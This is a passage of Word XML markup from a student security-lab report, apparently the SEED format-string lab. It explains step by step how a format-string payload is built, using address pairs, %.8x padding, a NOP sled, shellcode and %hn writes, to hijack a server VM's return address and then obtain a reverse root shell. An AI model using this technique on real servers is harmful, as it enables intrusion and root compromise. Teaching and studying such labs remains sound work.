      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>The return address is same as which we found in task2, it is 0xbffff0</w:t>
      </w:r>
      <w:r w:rsidR="00342D38">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 4 = 0xBFFFF08C, so we put (0xBFFFF08E@@@@0xBFFFF08C) in the beginning</w:t>
      </w:r>
      <w:r w:rsidR="005A5BA6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00EF61A5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the message</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. And then we put 22 </w:t>
      </w:r>
      <w:r w:rsidR="00301CC2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%.8x</w:t>
      </w:r>
      <w:r w:rsidR="00301CC2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the return address</w:t>
      </w:r>
      <w:r w:rsidR="005A5BA6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move the var_list pointer to buf[]</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. Now we need put the value of the new return address; however, b</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ecause we do not know </w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the exactly location of shellcode</w:t>
      </w:r>
      <w:r w:rsidR="001A21AF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>assume it is in the beginning of the buf[]</w:t>
      </w:r>
      <w:r w:rsidR="00301CC2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (we will find out its location later)</w:t>
      </w:r>
      <w:r w:rsidR="005B42D1">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we also place </w:t>
      </w:r>
      <w:r w:rsidR="005B42D1">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> NOP in the middle between format </w:t>
      </w:r>
      <w:r w:rsidR="008B6B2F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the shellcode; so w</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">hen we successfully overwrite the return address, and the </w:t>
      </w:r>
      <w:r w:rsidR="002D466B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">function return </w:t>
      </w:r>
      <w:r w:rsidR="0080352C">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="002D466B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> this address;</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D466B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ven the address is not the beginning of shellcode, it is the NOP</w:t>
      </w:r>
      <w:r w:rsidR="008B6B2F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (move to next </w:t>
      </w:r>
      <w:r w:rsidR="00882862">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>instruction</w:t>
      </w:r>
      <w:r w:rsidR="008B6B2F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, so it wi</w:t>
      </w:r>
      <w:r w:rsidR="00B51D38">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ll move to </w:t>
      </w:r>
      <w:r w:rsidR="005A5BA6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00B51D38">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">he shellcode at last (this </w:t>
      </w:r>
      <w:r w:rsidR="00A43058">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00B51D38">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00A43058">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B51D38">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">answer </w:t>
      </w:r>
      <w:r w:rsidR="00A43058">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B51D38">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">the question of why use NOP in the lab description). </w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Afterwards, we append the shellcode in the end</w:t>
      </w:r>
      <w:r w:rsidR="008B6B2F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the message</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Now we output the message</w:t>
      </w:r>
      <w:r w:rsidR="005A5BA6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a file</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, and we use Bl</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ess Hex Editor to </w:t>
      </w:r>
      <w:r w:rsidR="005A5BA6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">open the file to </w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>check where</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the shellcode location</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. As screensh</w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ot2 shows, the shellcode is 0xa4</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> away from the beginning of buf[]. So </w:t>
      </w:r>
      <w:r w:rsidR="00710BBD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>new return</w:t>
      </w:r>
      <w:r w:rsidR="00710BBD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> address </w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>is 0xbffff0d0 + 0xa4</w:t>
      </w:r>
      <w:r w:rsidR="00882862">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0xbffff174</w:t>
      </w:r>
      <w:r w:rsidR="006C3D5F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because it </w:t>
      </w:r>
      <w:r w:rsidR="00882862">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>is still ve</w:t>
      </w:r>
      <w:r w:rsidR="00710BBD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ry large, so we separate it to two parts, we write first part (BFFF) to 0xBFFFF08E, and we write second part</w:t>
      </w:r>
      <w:r w:rsidR="004813F5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>f174</w:t>
      </w:r>
      <w:r w:rsidR="004813F5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00710BBD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 0xBFFFF08C.</w:t>
      </w:r>
      <w:r w:rsidR="000B55C9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now we can calculate the new return address</w:t>
      </w:r>
      <w:r w:rsidR="00710BBD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, we still use the technique in task5.c, we use %hn to write in the return address. So we need to print out more character to reach the number 0xBFFF. Now we already print our 12 (return address) + 22*8 (%.8x) + 22 (“.”)</w:t>
      </w:r>
      <w:r w:rsidR="00B90244">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we still need 48941 </w:t>
      </w:r>
      <w:r w:rsidR="002D466B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidR="00B90244">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>character. So we add %.48941x to reach 0xBFFF and use %hn to write on 0xBFFFF08E. Then we do the same thing again, we write (0x</w:t>
      </w:r>
      <w:r w:rsidR="00B90244" w:rsidRPr="007B64CD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>F1</w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>74</w:t>
      </w:r>
      <w:r w:rsidR="00B90244">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 0xBFFF </w:t>
      </w:r>
      <w:r w:rsidR="005E47EC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00B90244">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 12660</w:t>
      </w:r>
      <w:r w:rsidR="00B90244">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) characters to reach number 0x</w:t>
      </w:r>
      <w:r w:rsidR="00B90244" w:rsidRPr="007B64CD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>F1</w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>74</w:t>
      </w:r>
      <w:r w:rsidR="002D466B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use %hn to write on 0xBFFFF08C</w:t>
      </w:r>
      <w:r w:rsidR="00695887">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0014440E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now we finish to construct the message</w:t>
      </w:r>
      <w:r w:rsidR="00A5447A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (format string)</w:t>
      </w:r>
      <w:r w:rsidR="00C679E4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, if we open it by Hex Editor, it shows in following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0DB21" w14:textId="59903CD2" w:rsidR="00C679E4" w:rsidRDefault="00001A20" w:rsidP="00C679E4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BEC5AE0" wp14:editId="32A5418A">
            <wp:extent cx="4509135" cy="2059336"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="../../../../Desktop/Screen%20Shot%202018-10-22%20at%201.2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0-22%20at%201.23.08%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11655" cy="2060487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA94A0" w14:textId="62CE982D" w:rsidR="00D14E36" w:rsidRDefault="00A375DC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we send the </w:t>
      </w:r>
      <w:r w:rsidR="00882862">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server VM by the function s</w:t>
      </w:r>
      <w:r w:rsidR="0014440E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>end_to_server(). As secreenshot4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows, after server VM received our message, it removes the /tmp/myfile. If we send the same message again, the server shows “No such file or directory” error.</w:t>
      </w:r>
      <w:r w:rsidR="00D15A14">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> So our attack is successful</w:t>
      </w:r>
      <w:r w:rsidR="0014440E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshot5)</w:t>
      </w:r>
      <w:r w:rsidR="00D15A14">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB99C8" w14:textId="4674A9D5" w:rsidR="003807EC" w:rsidRDefault="00001A20">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33E6325A" wp14:editId="663626A0">
            <wp:extent cx="5939790" cy="4035425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>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4035425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607568F" w14:textId="77777777" w:rsidR="003807EC" w:rsidRDefault="003807EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B48D5BC" w14:textId="77777777" w:rsidR="00EA4F58" w:rsidRDefault="00EA4F58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243C506F" w14:textId="71C35F67" w:rsidR="00EA4F58" w:rsidRPr="00D4765D" w:rsidRDefault="00EA4F58">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4765D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task7:</w:t>
      </w:r>
      <w:r w:rsidR="00D4765D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Getting a Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E68293" w14:textId="360BEAAB" w:rsidR="00EA4F58" w:rsidRDefault="00FE20EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB570C5" wp14:editId="5F50B3BB">
            <wp:extent cx="5939790" cy="1367790"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="95" name="Picture 95" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.05.5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1367790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="008FE76D" w14:textId="504A50F4" w:rsidR="00EA4F58" w:rsidRDefault="00EA4F58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00F9319E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1, run the sever program on sever VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33188F9D" w14:textId="77777777" w:rsidR="00F9319E" w:rsidRDefault="00F9319E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E106F17" w14:textId="694BDA80" w:rsidR="00F9319E" w:rsidRDefault="00FE20EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA5D845" wp14:editId="6798ABFE">
            <wp:extent cx="4977786" cy="1488440"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:docPr id="96" name="Picture 96" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.07.5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9121" cy="1488839"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34E3CC" w14:textId="2DE4C4C6" w:rsidR="00F9319E" w:rsidRDefault="00F9319E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2, we setup listening port on the attacker VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371C023" w14:textId="77777777" w:rsidR="00F9319E" w:rsidRDefault="00F9319E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5DB366" w14:textId="2CA69428" w:rsidR="00F9319E" w:rsidRDefault="00FE20EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5A738D" wp14:editId="7DC8B22B">
            <wp:extent cx="3420343" cy="1100198"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="97" name="Picture 97" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.09.0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5505" cy="1101859"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A935C" w14:textId="173154DA" w:rsidR="00F9319E" w:rsidRDefault="00B80411">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17231A63" wp14:editId="34616375">
            <wp:extent cx="5924550" cy="1730375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%204.5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0-20%20at%204.55.1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1730375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C428D" w14:textId="5993A8A7" w:rsidR="00F9319E" w:rsidRDefault="00F9319E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot3, we send message to the server VM by python program</w:t>
      </w:r>
      <w:r w:rsidR="006A76A9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from attacker VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC1B37" w14:textId="77777777" w:rsidR="00F9319E" w:rsidRDefault="00F9319E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610CEE29" w14:textId="76246710" w:rsidR="00F9319E" w:rsidRDefault="00EF3CF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497FF46F" wp14:editId="39D687CC">
            <wp:extent cx="5909310" cy="4080510"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="9" name="Picture 9" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%204.1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0-20%20at%204.18.47%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09310" cy="4080510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB93E31" w14:textId="1CB8184E" w:rsidR="006A76A9" w:rsidRDefault="006A76A9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot4, we go back to the attacker VM to check the listening port, we get a root shell of the server VM. To prove this, we run command ifconfig, we see the IP address is 10.0.2.5. we also run command id, we see it is a root shell</w:t>
      </w:r>
      <w:r w:rsidR="00D4765D">
        <w:rPr>
